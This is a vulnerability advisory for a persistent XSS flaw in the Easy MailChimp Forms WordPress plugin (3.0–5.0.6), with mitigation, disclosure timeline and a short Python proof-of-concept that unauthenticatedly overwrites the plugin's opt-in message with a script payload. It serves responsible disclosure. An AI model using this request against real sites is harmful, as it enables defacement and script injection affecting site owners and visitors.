Easy MailChimp Forms 3.0 - 5.0.6, Persistent XSS
Due to exposing a single AJAX function to anonymous users by using the ‘nopriv’ method of adding AJAX actions, anonymous users are able to update the settings for this plugin, including updating the Custom Opt-In Message with HTML content. Utilizing this method can result in a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.
Homepage
https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Remove the vulnerable AJAX definition in the ‘lib/lib.ajax.php’ file. If public access to some of the AJAX functions exposed by this definition is required, expose them utilizing a separate AJAX definition.
Proof of Concept
The following Python script will update the content of the Custom Opt-In Message with the content of the html_payload variable
import requests
html_payload = "<script>alert('.');</script>"
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
"action":"yks_mailchimp_form",
"form_action":"update_options",
"form_data":"yks-mailchimp-api-key=&yks-mailchimp-flavor=1&yks-mailchimp-optin=true&double-optin-message=%s&single-optin-message=&interest-group-label=Select+Your+Area+of+Interest&yks-mailchimp-optIn-checkbox=1&yks-mailchimp-optin-checkbox-text=SIGN+ME+UP!&yks-mailchimp-optIn-default-list=select_list"%html_payload
}
r = requests.post(url, data=payload)Timeline
- 2014-09-19: Discovered
- 2014-09-19: Reported to vendor:
- 2014-09-19: CVE requested
- 2014-09-19: Vendor acknowledged and stated a fix would be made today
- 2014-09-19: 5.0.7 released – issue resolved
- 2014-09-22: CVE assigned
- 2014-09-26: Advisory released